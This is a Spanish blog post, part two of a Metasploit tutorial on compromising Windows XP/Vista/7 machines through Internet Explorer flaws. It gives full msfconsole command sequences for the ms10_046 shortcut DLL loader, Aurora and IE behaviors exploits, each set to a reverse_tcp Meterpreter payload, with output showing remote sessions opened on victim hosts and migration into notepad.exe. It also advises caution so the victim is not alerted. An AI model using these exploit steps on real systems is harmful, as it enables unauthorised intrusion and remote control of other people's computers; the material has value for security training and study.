Inicio > Hacking, MetaSploit > Penetrando Sistemas Windows con MetaSploit FrameWork – Parte II

Penetrando Sistemas Windows con MetaSploit FrameWork – Parte II

CONCEPTOS BASICOS DE PENETRACION EN MAQUINAS BAJO PLATAFORMA WINDOWS XP/VISTA/7 USANDO METASPLOIT FRAMEWORK – Parte II

Shortcut_icon_dllloader IE 6.0, IE 7.0, IE 8.0

Este exploit intenta aprovechar una vulnerabilidad en la manipulación de accesos directos de windows (.LNK) que contienen un icono que apunta a una DLL maliciosa. La ejecución de este exploit creará un servicio WebDAV en la maquina del atacante para la ejecución de un payload arbitrario cuando la víctima intenta acceder como recurso UNC.

msf> use exploit/windows/browser/ms10_046_shortcut_icon_dllloadermsf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.1.34

LHOST => 192.168.1.34

msf exploit(ms10_046_shortcut_icon_dllloader) > set LPORT 4450

LPORT => 4450

msf exploit(ms10_046_shortcut_icon_dllloader) > show options

Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):

Name Current Setting Required Description

—- ————— ——– ———–

SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0

SRVPORT 80 yes The daemon port to listen on (do not change)

UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4).

URIPATH / yes The URI to use (do not change).

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

—- ————— ——– ———–

EXITFUNC process yes Exit technique: seh, thread, none, process

LHOST 192.168.1.34 yes The listen address

LPORT 4450 yes The listen port

Exploit target:

Id Name

— —-

0 Automatic

msf exploit(ms10_046_shortcut_icon_dllloader) > exploit

[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.34:4450

[*]

[*] Send vulnerable clients to \\192.168.1.34\nXdeLrAW\.

[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk

[*]

[*] Using URL: http://0.0.0.0:80/

[*] Local IP: http://192.168.1.34:80/

[*] Server started.

Una vez el usuario ingresa al servicio que MetaSploit ha iniciado, comienza el ataque intentando abrir una conexión Meterpreter contra el objetivo, sin embargo, este ataque en particular puede alertar al usuario, dado que automáticamente se crea un recurso compartido con la maquina remota del atacante y el usuario podrá ver claramente en dicho directorio las DLL compartidas, por esta razón se recomienda prudencia con su uso.

msf exploit(ms10_046_shortcut_icon_dllloader) >[*] Sending UNC redirect to 192.168.1.36:49381 …

[*] Responding to WebDAV OPTIONS request from 192.168.1.36:49384

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /

[*] Sending directory multistatus for / …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /

[*] Sending directory multistatus for / …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW

[*] Sending 301 for /nXdeLrAW …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/

[*] Sending directory multistatus for /nXdeLrAW/ …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW

[*] Sending 301 for /nXdeLrAW …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/

[*] Sending directory multistatus for /nXdeLrAW/ …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW

[*] Sending 301 for /nXdeLrAW …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/

[*] Sending directory multistatus for /nXdeLrAW/ …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/desktop.ini

[*] Sending 404 for /nXdeLrAW/desktop.ini …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW

[*] Sending 301 for /nXdeLrAW …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/

[*] Sending directory multistatus for /nXdeLrAW/ …

[*] Sending LNK file to 192.168.1.36:49384 …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/cufAOBP.dll.manifest

[*] Sending 404 for /nXdeLrAW/cufAOBP.dll.manifest …

[*] Sending DLL payload 192.168.1.36:49384 …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/cufAOBP.dll.123.Manifest

[*] Sending 404 for /nXdeLrAW/cufAOBP.dll.123.Manifest …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/cufAOBP.dll.124.Manifest

[*] Sending 404 for /nXdeLrAW/cufAOBP.dll.124.Manifest …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/cufAOBP.dll.2.Manifest

[*] Sending 404 for /nXdeLrAW/cufAOBP.dll.2.Manifest …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW

[*] Sending 301 for /nXdeLrAW …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/

[*] Sending directory multistatus for /nXdeLrAW/ …

[*] Sending stage (749056 bytes) to 192.168.1.36

[*] Meterpreter session 3 opened (192.168.1.34:4450 -> 192.168.1.36:49385) at Fri May 13 00:56:37 +0200 2011

[*] Responding to WebDAV OPTIONS request from 192.168.1.36:49384

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW

[*] Sending 301 for /nXdeLrAW …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/

[*] Sending directory multistatus for /nXdeLrAW/ …

AURORA

Se trata de un exploit que aprovecha la vulnerabilidad Aurora encontrada en navegadores IE 6.X y 7.X sobre el uso inadecuado de la pila de memoria, donde se accede a posiciones de memoria sin inicializar permitiendo al atacante inyectar código malicioso a dichas direcciones de memoria, al igual que otros exploits indicados anteriormente, este inicializa un servicio de MetaSploit que espera a que un cliente inicie la interacción con un navegador vulnerable para ejecutar el ataque.

msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms10_002_aurora) > set URIPATH /

URIPATH => /

msf exploit(ms10_002_aurora) > set LHOST 192.168.1.34

LHOST => 192.168.1.34

msf exploit(ms10_002_aurora) > exploit

[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.34:4444

[*] Using URL: http://0.0.0.0:8080/

[*] Local IP: http://192.168.1.34:8080/

[*] Server started.

msf exploit(ms10_002_aurora) >

[*] Sending Internet Explorer “Aurora” Memory Corruption to client 192.168.1.38

[*] Sending stage (749056 bytes) to 192.168.1.38

[*] Meterpreter session 1 opened (192.168.1.34:4444 -> 192.168.1.38:1094) at Fri May 13 22:47:19 +0200 2011

sessions

meterpreter>

IEPEERS

Se trata de una vulnerabilidad incluida en las funcionalidades de “comportamiento” DHTML de Internet Explorer versiones 6.X y 7.X, esta vulnerabilidad es conocida como “IEPEERS” dado que se encuentra localizada específicamente en la DLL “iepeers.dll” a lo que Microsoft respondió que era necesario restringir el acceso a dicha librería, con lo que en versiones superiores a la 7 de IE este exploit ya no funciona como se espera.

msf > use exploit/windows/browser/ms10_018_ie_behaviorsmsf exploit(ms10_018_ie_behaviors)> show options

Module options (exploit/windows/browser/ms10_018_ie_behaviors):

Name Current Setting Required Description

—- ————— ——– ———–

SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0

SRVPORT 8080 yes The local port to listen on.

SSL false no Negotiate SSL for incoming connections

SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

URIPATH no The URI to use for this exploit (default is random)

Exploit target:

Id Name

— —-

0 (Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista

msf exploit(ms10_018_ie_behaviors) > set URIPATH /

URIPATH => /

msf exploit(ms10_018_ie_behaviors) > set SRVPORT 8081

SRVPORT => 8081

msf exploit(ms10_018_ie_behaviors) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms10_018_ie_behaviors) > set LHOST 192.168.1.34

LHOST => 192.168.1.34

msf exploit(ms10_018_ie_behaviors) > set LPORT 4441

LPORT => 4441

msf exploit(ms10_018_ie_behaviors) > exploit

[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.34:4441

[*] Using URL: http://0.0.0.0:8081/

[*] Local IP: http://192.168.1.34:8081/

[*] Server started.

msf exploit(ms10_018_ie_behaviors) >

[*] Sending Internet Explorer DHTML Behaviors Use After Free to 192.168.1.38:1130 (target: IE 6 SP0-SP2 (onclick))…

[*] Sending stage (749056 bytes) to 192.168.1.38

[*] Meterpreter session 2 opened (192.168.1.34:4441 -> 192.168.1.38:1138) at Fri May 13 23:02:01 +0200 2011

[*] Session ID 2 (192.168.1.34:4441 -> 192.168.1.38:1138) processing InitialAutoRunScript ‘migrate -f’

[*] Current server process: IEXPLORE.EXE (1372)

[*] Spawning a notepad.exe host process…

[*] Migrating into process ID 1264

[*] New server process: notepad.exe (1264)

 

  1. Aún no hay comentarios.
  1. No trackbacks yet.

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: